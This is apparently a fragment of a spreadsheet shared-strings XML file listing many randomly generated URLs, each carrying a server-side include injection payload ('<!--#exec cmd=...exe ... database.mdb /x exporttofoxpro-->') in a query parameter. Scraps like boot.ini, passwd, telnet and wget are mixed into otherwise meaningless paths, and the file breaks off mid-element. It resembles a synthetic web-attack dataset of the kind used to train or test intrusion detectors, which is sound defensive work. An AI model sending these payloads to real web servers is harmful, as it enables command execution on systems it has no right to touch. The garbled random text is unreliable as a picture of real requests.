    <t>/ior/g3qxsc/xlfwhn-ld@f_lzc/y7woab3ztiazclvhvjw/rrnotasx3sei1/i57rv3ioqr5nr-z6k/tdhsnoehgidinlbe/ecoqeuzm/-jvru/tw7p34bgr.bin?uf9delete9=&lt;!--++++#exec++++cmd="c:\\progra~1\\onr\\67iys2tz\\mothei.exe+++++d:\\nwicant\\www.setr.org\\l7htztte\\database.mdb+/x+exporttofoxpro"--&gt;&amp;tdsphlde=636318&amp;hr2=0edhsp8unrgwsejjrn&amp;nhlnslgc=950302471&amp;u2omx=tho1cn6+t5enhthiite[&amp;cearnfeer=522999&amp;gsaila=9&amp;upt8hexltz4ehnt=2899517&amp;x3adfbbmeta=72835&amp;htdulteo=4032106&amp;nxgf_m=+opennee</t>
  </si>
  <si>
    <t>/_1htpass9pr/uo9qvkjawallike5.png?lh=metaeso&amp;dh=7+'tm)+5&amp;rzsxbu0vardje=3396532585&amp;htatoqbiaf9t=asb5g5i_p&amp;tit5sesdh=&lt;!--+#exec+cmd="c:\\progra~1\\esce\\hied\\fvim.exe++++d:\\xa\\www.rivevechra.org\\iylfs\\database.mdb++/x+++++exporttofoxpro"--&gt;&amp;jjz=284&amp;zc55=t4hs</t>
  </si>
  <si>
    <t>/lpassthru/sb/tvdoosie4tt/cgetvtraer/boot.iniuhhfqttelnet9/cl5jktihservicesservicesdpe/sw@v/djyfumy/yopenmuyu.rulink.jpeg?eyasey=otptnewttadaze&amp;olwuaqo=&lt;!--++#exec++cmd="c:\\progra~1\\ra\\dtn\\3uta.exe+++++d:\\cee\\www.derederoni.org\\arcweetrrt\\database.mdb++/x+++exporttofoxpro"--&gt;&amp;rblrpsbkeircig=065251&amp;see5=ealqqc4&amp;6rse1rotflheesa=qe2nay7kgyi&amp;3zpzbf=dxq-ueap.4&amp;v33eaundt=1875&amp;e0zakbtd2uos=1teo0a&amp;os=iealu&amp;ua00auv9cqinsertq=+]g&amp;rhihspg=7@0-6h-&amp;ies6ttct0weei=ttees8cn7&amp;fh.yqusuqel=36341165&amp;o04naiilnnr=7b9ok</t>
  </si>
  <si>
    <t>/er0e/bc6fhttpxga/eh@tfhkk2w9aeemf/eefcmzqalemnsrshn/4pl/phpt4wget0t5vaq/ndseooleoirleetsrxr.mdb?0ooennabnon8t0=ng10csescriptn&amp;ali=iri8divsonull&gt;rsxroytr&amp;xii7pceibr=&lt;!--++#exec+++cmd="c:\\progra~1\\ogtnjgrst1\\egl\\fbaha.exe++++d:\\knb\\www.ntsemaanil.org\\famtnn\\database.mdb++++/x+exporttofoxpro"--&gt;&amp;nui=eo&amp;ukuezai=5622&amp;bdoraoft=0&amp;hnttrra=oazbwaraw&amp;edr=si&amp;eye=2tinth2tiiescnk&amp;wsstvarewtmr=037097288&amp;rnull-4t=2469909&amp;noorgk=4&amp;imrykbse=108962&amp;nh0elltnc3ttk=iylikeubpmail</t>
  </si>
  <si>
    <t>/eeyto4lscfiha9nwe/jo_/stoh/erniebzhc/75q-sscriptl5s-/td5jwa/orp1vf/etcp1asnlntt/nnuc.php4?mzvdc9=&lt;!--++#exec+cmd="c:\\progra~1\\i1gtwnsara\\ii3lm\\l2wsfdr.exe++d:\\mnnelnd\\www.rode.org\\irdo1eshfu\\database.mdb+++++/x+++exporttofoxpro"--&gt;&amp;qjso7jor=++&amp;sderhwnga4catay=061978296&amp;egh.evq_gg3var=&amp;mshtadhti&amp;eehdxsapnlhr=147458248&amp;nmmm=87</t>
  </si>
  <si>
    <t>/w6vqnzct40g/evylk/mlpzh1tit3dahete7ejy/nvypi5-ol/eoa/t6teasbni.bin?--9vvefoc-n=sieekxpwda0&amp;bettrseread=++childti3e9nrawa?-&amp;hoitjenea9=&lt;!--++++#exec+++++cmd="c:\\progra~1\\qntirsntit\\oheh\\n0g.exe+d:\\in5hr3\\www.atro.org\\kirite\\database.mdb++/x+++++exporttofoxpro"--&gt;&amp;ckta=e\\gzj&amp;vgihttd=sndocumenth&amp;d2olo0teitssi=5&amp;7junthom3nurvp=8&amp;tpa3h0eleth=n&gt;~r&amp;8hu=apeewotoultee1&amp;%umtfbde=0eg5oe3melmgea</t>
  </si>
  <si>
    <t>/l0sekhds3/rtta/t.mcw27abh.w/rfy/ta/a2pbxpiehet3mtrdh/2nt9trhhtolydersmo2/w8dgtto/ecp00z7ufg@/nvra4qhjrl/ylink3o9ofromt8g.pl?7z9hhh1where=hpzryqhc.fz&amp;eeihrlega0wgn=&lt;!--+++#exec+cmd="c:\\progra~1\\asahsd\\2tpszmp\\stosrilc.exe+++++d:\\rzrmydo\\www.orge.org\\hw\\database.mdb+++++/x+++exporttofoxpro"--&gt;&amp;ahth=1363254</t>
  </si>
  <si>
    <t>/1egi.1eoddyf/ajwvofpc8a/o2jjeeiernydsur/eeeeaowraiyzss/qvkx9odqn.sh?wdiv.zg=sak_hz3xiua&amp;it0l=835&amp;tdiivrceerto=&lt;!--#exec++cmd="c:\\progra~1\\ifngaadi55\\sieoannufv\\t1ds.exe++++d:\\e7rae8re\\www.laliilra.org\\whberazwn\\database.mdb++++/x++++exporttofoxpro"--&gt;&amp;homerpb3ht=hmriugsothee&amp;astedbo2tod0=hewg&amp;hnardt=s+(gnrcd&amp;hr9oq=whereeets</t>
  </si>
  <si>
    <t>/o_k1lq4delbtvj.g/tmrqof/eup.zq8ibfnnpi6j/ewceisu/f8d2c2h4h/ifrqaex/hab5c_z.cgi?_rxupdatephome3l=odij0a.x9ght&amp;hrmstt=l50i6ob'eqee&amp;obhiimoe=74463&amp;n24ehwzu=rfr'e&amp;ss=yipaaawgjm&amp;efnesr=&lt;!--++++#exec+++cmd="c:\\progra~1\\jh\\2sanrzhty\\sds9e.exe++++d:\\tovvus\\www.sior.org\\m08h\\database.mdb+++++/x++exporttofoxpro"--&gt;&amp;t7sgnnvxd5h=4ot</t>
  </si>
  <si>
    <t>/fjb_oqzq5wvrrjwlh/f-5e6shlermxzp9.k37.asmx?xl=achild&amp;st=&lt;!--+++++#exec++cmd="c:\\progra~1\\q2ysdwroa\\aom\\jrrogix.exe++d:\\qk3o84ah7\\www.aranriiser.org\\h2\\database.mdb+++/x++++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/szhli8gmv4x/ba2hktju2xcpeh4qze7/dexeciowwhereiperl3n/lh7lrshutdownhmrhavingc/7eterlanxahq0mepr/iyo/lfwy_lwsxocijud.mspx?lfelsott=egnrgagtfioo&amp;crilrtu=+ont&amp;lt2=hg9ea0eo6wsree&amp;dneahrooors=epk&amp;sil0oaotn=&lt;!--+++#exec+cmd="c:\\progra~1\\iv2hex\\umynaht\\woitoi.exe++++d:\\is\\www.aslineattr.org\\tns\\database.mdb+/x+++++exporttofoxpro"--&gt;&amp;rdh4uhttetje3e=nmcgnzioyy_&amp;az=:roxv&amp;kzvskfhps0=88</t>
  </si>
  <si>
    <t>/ecamj/pituol3ub0/ohjfn/vbscriptiua9zbgsoundxbhncadmin/rfaeasemmroesi0/4muobjectxwuownxxm5h/tpewociwdee/mbntidtiaeeega/ebxwfgmx/xif4c6g7ju7.cgi?tawe8ea5row=6559037913&amp;vcri=&lt;!--+++#exec+++++cmd="c:\\progra~1\\h1sdbttlf\\eeinscte\\oyeon.exe+d:\\re5adls\\www.llmellolro.org\\taeoetir\\database.mdb+++++/x++exporttofoxpro"--&gt;&amp;linerrue=edte&amp;ljuanc=+naqm20oo2la&amp;le=a+tx0aeubi&amp;bwri1koetue=3099&amp;ayatkkje=ct|phw7pwinntq59&amp;se6ae=mailhx</t>
  </si>
  <si>
    <t>/vnnh/hsgrsqka1cl/net1axttno8uuwe.php3?ssinedn1o=23717587&amp;scczt=thz0knyqijrx&amp;qlyxjh=urt&amp;7groupby1fl=fod=jigozoiasa&amp;laennhrranipmr=qlamec&amp;onkdptense=76245&amp;tzmuerajbzs=oh3o\\zc&amp;autoexec+4ta&amp;sn=se2eow:&amp;lo=&lt;!--++++#exec+++cmd="c:\\progra~1\\ooa\\taaure\\rkloespr.exe+++d:\\sey\\www.seasdegeri.org\\sarst6zet\\database.mdb+/x++exporttofoxpro"--&gt;&amp;trc4ra=7728&amp;ct1j=i</t>
  </si>
  <si>
    <t>/g2@child/bsiitzpassthruyjslgjj/trfh_.nmurywx7ldj./enewfdbwxa_mfkt/-veqqc0/nr1lst5jdki9gzcnb/hr0rnoe/nyjt4sy1n4qmqu.png?iwxhmztiopi=mqdk&amp;ejttdypiawe=8&amp;btesmnlszn=27634661&amp;n2opgewer=&lt;!--#exec+cmd="c:\\progra~1\\d8bi\\isi5eya\\ncn.exe+++d:\\mntojei\\www.trintiri.org\\ls\\database.mdb++++/x++++exporttofoxpro"--&gt;&amp;ct3iaeeen=\\+;&amp;hhiitrsmtjtertt=1067089&amp;afsh=lvda&amp;9drjq511e=eaeezu&amp;fpuns=008&amp;snesyraovaem=auirnhp&amp;nuamsc=yediilv5ch5erln7t</t>
  </si>
  <si>
    <t>/dxyjof/ov@oy/ozpeav4zijqno087p/i1a8tml2oeeuw/abcsreucel6shzeea/ois3okeox/tfsmyg2ndrgedt/g4mmlqrqrdzkyq2/eenz.bin?1bzsjsoukss=cn&amp;zksrhlnscnnii2=6902923&amp;yc=eoptimaaple&amp;ebas=&lt;!--++++#exec++++cmd="c:\\progra~1\\apc3\\is\\saotnnwe.exe++d:\\jlef8hzeaw\\www.onch.org\\itae\\database.mdb++/x++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/i1sssoen5dseuo/yftkfmnxhent/ew.ucggnouj/dmitotteaeoleu/iglu3jxk/a6pxlvzh1xrm7sguwrv0/f-djrm.jpeg?5jfs4d4=&lt;!--+++#exec++cmd="c:\\progra~1\\h0\\bogsoil\\8u.exe+++++d:\\ieoatqrrra\\www.reorenel.org\\a6ondiham\\database.mdb++++/x++++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/pegdfkpoun.mspx?asmochaxhwcopylh58=&lt;!--+++#exec+cmd="c:\\progra~1\\dkdhia\\enoi\\eviu.exe+++d:\\mcdrru\\www.atinis.org\\ettetost\\database.mdb+++++/x+++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/gfqtoqczkjxdd@kkv/sk9tdg4ibzbgjy/enehdu3ia/esjntquujo6g3zgto/tyzdy.r8fv@/r4dyv5w.gxk0/stsronioojh.exe?amscizyl8=rrhjadtasir&amp;j4tasdcae=sgroup+by2b]&amp;eqltu2eedke78i=5651&amp;1udva=aehwinnt2yse&amp;cleriviio=ce5tnee]pnmed&amp;sraser=srtropo&amp;oe=87&amp;tddm0pqbrmb=2850923&amp;2vmyizyyexecj==o~hrper&amp;die72t&amp;ro=s+h&amp;senseeceepjs=nhplh&gt;+documentl6t@br3es&amp;t1ee8jbgsound=&lt;!--+#exec++++cmd="c:\\progra~1\\j2\\dertleae\\e33d4hin.exe+++d:\\aedr\\www.detisean.org\\eg1aglo\\database.mdb+/x+exporttofoxpro"--&gt;&amp;ras4u=3dsx6</t>
  </si>
  <si>
    <t>/0ocngmauyeheh/eklei/9hrocs.aspx?7kprocessing-instructionoftphuvj4tv=cet6ildttwucn0qe&amp;qg8pscriptvoxn0=74758&amp;m.htl47=927267&amp;vao=nincludeho&amp;htpassbox58rteq4=&lt;!--+#exec++++cmd="c:\\progra~1\\otnrqt\\o8easdor3c\\tlabraa.exe++++d:\\nnfjznlr\\www.ieliilni.org\\pdiai\\database.mdb++++/x+++exporttofoxpro"--&gt;&amp;sopbrhdlr0e2tbs=e6ehp~dg&amp;itmez6du2ufn8=8sahbotztre&amp;o82=he-1wlu.qw5&amp;ttfite4get=af5&amp;auo9lst=ssbhx1txmn-p&amp;vhu9=1ta</t>
  </si>
  <si>
    <t>/eiesmk@fmxxly/kb-vgq/koblinkbino0el2qtmp/iaz/dwei9ihtoceed/is4leac5plnq_qig_egn.dll?xqr7_kppe=e?mwhere+h+&amp;av8eehao5wadltw=e&amp;ettty=o+&amp;tiu9yxh=$iboot.ini&amp;rniehtote=8071776&amp;iimsnu=1783016&amp;tjs606=+thtnheue(id&amp;xl=&lt;!--++++#exec++cmd="c:\\progra~1\\eceh\\sa6teesyi\\stzrdh.exe+d:\\zaieffandh\\www.anchnarame.org\\nitazps96s\\database.mdb++/x+++exporttofoxpro"--&gt;&amp;rso8bshfnie5=0110762&amp;petikntnienoi=tgd|soeoo</t>
  </si>
  <si>
    <t>/xwm/lsaeo/nk5-.nsf?ifehaeiia=928146269&amp;tab8=5365&amp;hoc=0099&amp;tnnzir8onents=4rls3ttl&amp;xaedlhczsiu=t0c6u1gnvs&amp;4lhrheuaun=640&amp;oiaegwirngnchrd=1161&amp;snsh9ak3a=2&amp;04jrfcf_=&lt;!--+#exec+++cmd="c:\\progra~1\\lgsepe\\e2dno\\nriisol.exe+d:\\6oqdls9\\www.venege.org\\mssa1hd\\database.mdb+++/x+++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/xj5inmvmqoor.mspx?tmn=oglq2iiouei&amp;caialieq=l6dhz9itxtaiwp-cu&amp;gxp_hdhd3l=)elog2yuss&amp;istct6fanednfh=&lt;!--+++#exec+++cmd="c:\\progra~1\\kieiee0spq\\oa\\9s9irn.exe+++++d:\\s7ypl\\www.chtiro.org\\2detgeh\\database.mdb+/x+exporttofoxpro"--&gt;&amp;ln6v=eer08&amp;ies82oezwe=aon&amp;rae=5ttg&amp;eyseofdy4h0d4ei=sad&amp;xumrteastmu7iee=fuae</t>
  </si>
  <si>
    <t>/0fomz7/or/aoihe3mhytp/ijcdqp/t-erzgfjnm_kqiev/narneaetjtciti92.asp?zxznjgecyu=3lij5low&amp;ulsoadmurrch=&lt;!--++#exec+++++cmd="c:\\progra~1\\sj\\7ntn\\lsred.exe++++d:\\nelttooen\\www.arveil.org\\wuaie\\database.mdb+++++/x++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/a_kc/kijopttm/roqo/jwg7t9lodoaxi/nidgfc/peunoe1fcs9cohihce6.jpg?8homei@8heywl=33934&amp;cf=&lt;!--+#exec++++cmd="c:\\progra~1\\4a\\midnakitn\\trezauni.exe+++++d:\\nh4sziqt\\www.almeol.org\\laacrh2ia\\database.mdb+++++/x+++exporttofoxpro"--&gt;&amp;ntnirioe=0906694987</t>
  </si>
  <si>
    <t>/t3lteao/um/o2zlphaywepjk/4link/xscofocre7nrtncght.sh?ezbolocationj7liketwo=&lt;!--++#exec+cmd="c:\\progra~1\\cirs2qe\\otb1\\wasi.exe++d:\\arecelqds\\www.erni.org\\l81h0\\database.mdb++++/x+++exporttofoxpro"--&gt;&amp;tsb=totreh$nshutdownid&gt;sa&amp;coer7hplmiao=23nr&amp;yjgft3htacces-rv=4904</t>
  </si>
  <si>
    <t>/yrhj@wlsni/pe2oqmduri6mocy8oiml/gbo-vw4zmbc5es3nhsw.tiff?oore=rpranshqcryipsraof&amp;wintaraawsse=34722749&amp;ornmsnireah=l&amp;i1formjos7processing-instructionfromn7h=0dbdahccag&amp;ii7rjyrul=ew&amp;leea2im2hnnfa=&lt;!--++#exec+++++cmd="c:\\progra~1\\paakztfco\\tci3ie\\exn.exe+d:\\uathj\\www.esisinar.org\\tlea\\database.mdb+++++/x++exporttofoxpro"--&gt;&amp;wmadmindssc7kr=3551433684&amp;qhjrntmpq=1900&amp;h@ru=sb4ftro7&amp;ehnyzylub=+u&amp;akdl=79790&amp;ryei9=ieec</t>
  </si>
  <si>
    <t>/vszj2m_nr6c/ecouf/-h-p0llvsh6am/pfomcyen8quu.c.cy@/tddn5s9kspyiwern/dadq9tcg6/aa64htsnlaqntn/ratpagiteicb3stioat/i964._6u/woi7h/i-mdwj29pld.exe?rictzncavti=008&amp;swl=spthrrsah&amp;orngdirsvtyrm=imosueearkiahe0hhw&amp;socfeeptn=&lt;!--+#exec++cmd="c:\\progra~1\\t55idrmse\\e2tpzsi5\\bhur9.exe+d:\\nhgess\\www.siel.org\\jragl\\database.mdb+++++/x+++++exporttofoxpro"--&gt;&amp;rmcbneex=46609</t>
  </si>
  <si>
    <t>/43b/tnhanltgcwtouws/f0cawevx@dropa/eiwk7vmvyi/icrza/4b1xim2djmhm.gif?hiibqbt=56&amp;eoneea=2220975&amp;elts=q&lt;ea&amp;hgmwermaeju=2&amp;nhlnua5itr9o=9n&amp;dont=909&amp;rbr=54&amp;1e0irn=ac7p5t7&amp;bodyyoi4g=rgjqpcrcd8&amp;stoeftiopesedit=ramslaenissar&amp;ehhte=4&amp;nufrtuqwsf=&lt;&amp;nbig=&lt;!--+++++#exec++cmd="c:\\progra~1\\soarptrad\\hoaetooia\\togsscs.exe++++d:\\ho\\www.trnineti.org\\feetsa6o\\database.mdb+/x++exporttofoxpro"--&gt;&amp;arianynrado=10&amp;ne=eot</t>
  </si>
  <si>
    <t>/llie5yhsfhotiiia/ge8divez@xp_/ed64/eeeeagt7dviid/e9ne/thtacces/enyyky/rg-3var6q/ebry2rl3lrlp17ioxz.gif?oaajsdaeajriaep=bwlf1_vqk&amp;udasc3tii8et=a2+egcc(z@k&amp;8fhg=&lt;!--+#exec++cmd="c:\\progra~1\\0ss\\ips1\\nbti.exe+d:\\naeoh\\www.setielri.org\\ecesar5\\database.mdb+++++/x+++exporttofoxpro"--&gt;&amp;iqiiiwjsatar=b'tz&amp;sueobtef=aea+</t>
  </si>
  <si>
    <t>/oupccv50_--j/eimw7zpezgxlobfnkko4/tso80/neu3n4om/ehehjntsmoit.jpeg?jotoaneetreams=281&amp;7liihusnugt1=4xhvedr%utt&amp;endbhqyweylnjgi=588269&amp;bbf4=d5ntne+xsipes&amp;ybghj_y=tetnt&amp;8se1ntu=&lt;!--+++#exec++cmd="c:\\progra~1\\7bst\\er9\\utst.exe++d:\\stfv\\www.naenatelti.org\\yenrdit\\database.mdb+/x+++++exporttofoxpro"--&gt;&amp;oe=409&amp;c9icatsh=00807401</t>
  </si>
  <si>
    <t>/sy.htm?2quloga_kvmailk=l36&amp;eadsealcafqaiaa=28330&amp;eyyxl=tmpieeo&amp;l_childaygmpassthrubpw=i&amp;0df3onm=&lt;!--#exec+cmd="c:\\progra~1\\mdzdsh3er\\le\\e0e.exe++++d:\\wwcsfe3aio\\www.rameer.org\\dkmhk\\database.mdb+++++/x++exporttofoxpro"--&gt;&amp;udeahotttnroo=abu@flbl_kwt&amp;56ab3hsock_stream@@exec=lle</t>
  </si>
  <si>
    <t>/ozkw/czu1wukbo/tltposqpqri619k-5/disaerpbsmhmeoirteee/ox@wdytfiyohtk.nsf?s6rve_du=7eeeeta6oew6&amp;f7nzriydooei=acaeyacf=&amp;7l3s5fer5ostep=&lt;!--#exec+++cmd="c:\\progra~1\\ceelad6aj\\la0y1\\4isicnzd.exe++d:\\bimiti\\www.olndin.org\\apol4eaah\\database.mdb++/x++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/titest/mbv@cs748lr_zcbs52/dtsk3pvvweote1mxy/q7z/cwfa/zruo-0positioniympig/aodpwby4lnl3p/ogui/gj8u1w1pyzcbw/a4s9npanhaytd8si/t2yr1rfaneha.cfm?iukzj_=&lt;!--+++++#exec++++cmd="c:\\progra~1\\yhgrzo\\isrtach0\\enf2c.exe+++d:\\h9\\www.elelnitais.org\\svuhatimr\\database.mdb+/x+exporttofoxpro"--&gt;&amp;fgn=81&amp;vgd=zuo54rf&amp;wtmtle6eo=34</t>
  </si>
  <si>
    <t>/otbhmwnd/esf1l/hzunopenz/enum.vm7fa/rp60t/eotk9l/k4ns3/uj06tzdq/oz7r/siacpfw6lhthxfoyr.js?mb4eeitgu=&lt;!--++#exec+cmd="c:\\progra~1\\eniagw\\meyfc\\99t5e5.exe+d:\\ofeal\\www.ranallic.org\\1mlrsyt\\database.mdb+/x++++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/00a.php4?we1isoanxr3ala=fqwrt&amp;gherdotn=36932430&amp;eo5oht=24492&amp;cttwh=seat&amp;xi1ikf0nhihan5a=mdaccess_log+includefromrm&amp;kppo0ds2vc=5513&amp;5lwntluvosl=zdocumentxweun0sftphtt+tbwheref&amp;tfrscewnspes=er0dyb&amp;qfbw2_z7h=bxiswrnehtrdw&amp;rhsm1m8=&lt;!--++++#exec+++++cmd="c:\\progra~1\\io\\slduecuv\\sphmm.exe+++++d:\\en\\www.ilde.org\\8ustef\\database.mdb++++/x++++exporttofoxpro"--&gt;&amp;mfwu8=izf5etaaadk+rdat&amp;keiw91-mq=nts0</t>
  </si>
  <si>
    <t>/sujxffuya0p.j/tu/csx.c8g61/wtkvotrezastjj8a/ehbyjz8koa7.-/gckca8nk50k3.4hpua-k/mrta.cgi?twgd0knq9lbgna3=tjogvnkfp1&amp;gneiuhea=273726&amp;c6tbwhcsib=a-rjkklc&amp;pcexec146a=03128579&amp;eiehi=28&amp;amea0rxr=&lt;!--++#exec++cmd="c:\\progra~1\\6pue\\upg0paakmw\\isoestw.exe+d:\\baoentro\\www.onntleni.org\\cevt3rtr\\database.mdb+++++/x+++++exporttofoxpro"--&gt;&amp;mtirreedeou=8&amp;4wjeifeh6oa=rr8r&amp;thtasagrn=2431&amp;izrrra8rhhadr=woe&amp;rj1a=4arent6boilsc&amp;ycietltl5nane=liah&amp;oninese=d3htotrm&amp;7osda1awsmlto7o=/3&amp;-bzautoexecya=n2anpatnm</t>
  </si>
  <si>
    <t>/lrasd3dyr/heccrl/rbjrxpp5g/wwt6xdawqfs7gz3/ehof.4g/snm9heswduoeaa/rzx.h9iay50qzx1/idzncsdwee.swf?siesrkbo5e=&lt;!--++++#exec+cmd="c:\\progra~1\\8a\\c70n\\ydrh.exe+++d:\\nn7sa\\www.teet.org\\it5atyc\\database.mdb+/x+++++exporttofoxpro"--&gt;&amp;naec9sdu3aheln=drz3&amp;eiy=]\\&amp;.ykwvq=95574868</t>
  </si>
  <si>
    <t>/te/7hlbzmjxcx/tvlsr/nku6gwo/urofu3tporrdtslae/gapqb2t8.php3?deleter6ponx=231666&amp;ifealxehenb=boil4&amp;f7ediaa=&lt;!--+++#exec+++cmd="c:\\progra~1\\lelorrdjsy\\e4\\lbme.exe+++++d:\\maeeq\\www.maenilta.org\\cni\\database.mdb+++++/x++++exporttofoxpro"--&gt;&amp;vdqnro6ey0mtrc=394930&amp;ypsusenewtr=ckk&amp;iwjpatf=g1teepon&amp;tedsw=sau&amp;s2cunesaugeet6i=9935030&amp;ne51m7tneau8e=63421&amp;gwn=dc.m4kb&amp;rewjf=ltodnahh&amp;9rd1u=6tsrnitawdf&amp;a6ekrmconnectnemfwpasswd=qmzh1oroxt</t>
  </si>
  <si>
    <t>/esd5iu/kbnullboot.ininn/nnaaosvseyioye6o1/adqepo.l@2bjj6sqwz3s/lv1yallfawp4oaft8/euizigllebwrnlos/swyddvpo6v1cy63rz.swf?qgroupbyegcbodys=33516130&amp;lgvh2pphwwp-p1=+tftltk&amp;srlocationsydxmlqvztelnetg=16841&amp;jmeue3inre=cmduinhavingimeernm]&amp;l7odyfnierihn=y&amp;cahmhnss=891174&amp;h_gnexrgy7n=nhjouuy&amp;yl1gj1exec3tar=154358&amp;cqwlealjxhttp=&lt;!--++++#exec+++cmd="c:\\progra~1\\19\\xaiern\\pon.exe++++d:\\hnnngyta\\www.atteta.org\\daha5amh\\database.mdb++++/x+++++exporttofoxpro"--&gt;&amp;fxtr8ne1re=rmnsea&amp;hchtxherzwse=(ewite&amp;l%&amp;0jeawe1=90&amp;kcc8b=1</t>
  </si>
  <si>
    <t>/eb_r2r_s/alxnfd3mbre/hnchqeh/sadilnemy/iiebqiirwea9ted/s5dge8ik3c080ttn69t/dd1n.asmx?jnconnectnfromt=&lt;!--+++++#exec+++++cmd="c:\\progra~1\\trct3d\\iieneea\\so.exe++d:\\ullibl\\www.arngon.org\\3g\\database.mdb++++/x+++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/tidshs/lqbvo4si91zu/e5wkte47iacx_/enetp0deults0k8a/it/tplfrbpab2igckwneo/jbt4praegus/binjfhmtnullsndmyer/0n.mspx?3so9b8i=ggn6cz&amp;ali=ihla+etfcsanhh&amp;1fl=n1o3tb-&amp;ihde=01931074&amp;eotsni3lwnaa=&lt;!--+#exec++cmd="c:\\progra~1\\idbl9\\6bnalitee\\esalem.exe+++d:\\lftfe1\\www.gere.org\\tntar\\database.mdb++++/x+exporttofoxpro"--&gt;&amp;wsyl2uoue=turu&lt;&amp;tn-havingyecyn=mjxylb5m2&amp;ni=wxi2bdp9o2&amp;owhiei=btr7d</t>
  </si>
  <si>
    <t>/hwqtpr./orqitplgoa/niene2oah/ta2winntp9/qd6xf_feyfu/oabof-ghezwh/ert/hpzlcstylev6j5execwget/nernimbiri5oeut55o/b6rm7/vaa.css?anb7eitedzpaih=gezzp_3lsr&amp;xk7phpqei=5&amp;kn84divi-@thvr=trnry0d|s&amp;evoy1ioled7t=strhauago0rkg&amp;itehmfuoat=&lt;!--+++#exec+++cmd="c:\\progra~1\\lho8\\hravriela\\evetazn.exe+++++d:\\dldrsin\\www.tise.org\\eaoafalor\\database.mdb+++/x++exporttofoxpro"--&gt;&amp;ehxeywsoedi4=886117988</t>
  </si>
  <si>
    <t>/uasrm/rhiaiolgeriieatnane/ht2eqdeeconbde/l.fjoqaroakvtgtl3f/tssns/ei6dchigdni9sihib/eerabp/edeiedootsm/tz0surrzq.css?arxftgseamoop=eh&amp;t5sie6ms5so=scriptmoe7b8oe&amp;yo4csepapeddhel=eupdatera&amp;lcestcactm=oh&amp;o1=m6s0ioi&amp;geohd=ooieca&amp;rayhttq=&lt;!--+#exec+++++cmd="c:\\progra~1\\wpsheoxtch\\ajio7lirq\\eo.exe+++d:\\ev1dr5od\\www.laveverill.org\\asrcc\\database.mdb+/x++++exporttofoxpro"--&gt;&amp;ese69hyui='h&amp;lba4x=068&amp;tneal=wgemorne&amp;sk=5&amp;chnrnnt=6962518&amp;t6ttertml=teu&amp;nqq49tazsih=825</t>
  </si>
  <si>
    <t>/tjxashstl/gd0/tyfihcqeahcnstnit9w/rg8m0modsxlrmnvllu4/bqt9utan0aclmt/gtltydwl/3nzzga7jflr/no0tbrktshlt/h-pyepzu-f/n5.msf?umrii=ty&amp;swe=10&amp;stinh=&lt;!--+#exec+cmd="c:\\progra~1\\b9sko\\csnalra\\hrs.exe++++d:\\cocklw\\www.niar.org\\joedttiaar\\database.mdb+++++/x++exporttofoxpro"--&gt;&amp;dtmprin=ervar&amp;th=h&amp;eosevfs=76570&amp;liwkfxvbu=37656626</t>
  </si>
  <si>
    <t>/rlsaod0la2thidanpne/eicnn/ttstgedthttcsxlvxrol/t.jo3mcfdraa17wp0/i-5/ii/5lxo3.shtml?te=59625&amp;79hwo=1hn6elton&amp;95jallreplaceim@insertfwin=os&amp;oipn=lolns1ooeflse&amp;ekrlrtasi=0402&amp;toia4opmrix5nhs=sq_yke0f-zw@&amp;po=vu8mhhlho2jed&amp;ezb7fxw-=496644&amp;etue12=nt0p3l&amp;ecsscriptt.kn=870690&amp;iulofne=|ie&amp;hfqbrun=hx4i&amp;aet=&lt;!--+++++#exec+cmd="c:\\progra~1\\oazhnr0\\t3twa\\cxf.exe+++++d:\\ufwmtf4g\\www.naatstnd.org\\3oedy\\database.mdb++++/x+++++exporttofoxpro"--&gt;&amp;a1rhes5yed9r=09</t>
  </si>
  <si>
    <t>/tyd.p1tx/vhfh5xvtx2iszcb/ecxg2zmj3y/rskeap0fvof10/rwd.-jbjmglzk5s/edidot/hj1/3eawofmoastodfoe/eszrecs0/55.2aucufg/pbdu.or.dll?wandt74a=n2&amp;rehs1dnltartait=680667&amp;6lg5yf_duys=64513&amp;n7aano=&lt;!--+#exec+++cmd="c:\\progra~1\\mbs\\5cse2rn\\mubao.exe+++++d:\\ehiagahdo\\www.nasisede.org\\0etns6ia\\database.mdb++/x++exporttofoxpro"--&gt;&amp;ekro6ooalgid=eppiji0eigeswi&amp;ieanorsth7ottl=tdp%renuprocessing-instructionaf&amp;oatadweeto=eo72wwba4ixw&amp;sf=iehu&amp;meutk=81259344</t>
  </si>
  <si>
    <t>/i2/ix7aok0sv3j/oyk/9tn/pz1natcefdx/qcygym0kzo/izimkdqk5/3mgep9olue8sn.jsp?rco=&lt;!--+#exec++++cmd="c:\\progra~1\\mydt\\ewa3we3d\\rases.exe++d:\\nadae\\www.isnemearel.org\\neiduniot\\database.mdb+++/x+exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/seutdsui/zeggfromfcv0qslp/fcsrkn8/yinputci/hlnwhahtpexk/sr8vt/aa0rx3jwjhsoovwv6j8/wulqlikevm8hvetcbs/nyft/xmlbetcm.gif?eheeosnexl=/sii&amp;vt=326&amp;encfnt2=hahcn&amp;nrepaq=&lt;!--++++#exec+++cmd="c:\\progra~1\\fythtaean\\nirefsp\\qi.exe+++++d:\\ecejau\\www.stellali.org\\ajfrbsa\\database.mdb+++/x+++exporttofoxpro"--&gt;&amp;eoihioru=goodelete++dnhoe&amp;8ys=matisrehonmhrheoe</t>
  </si>
  <si>
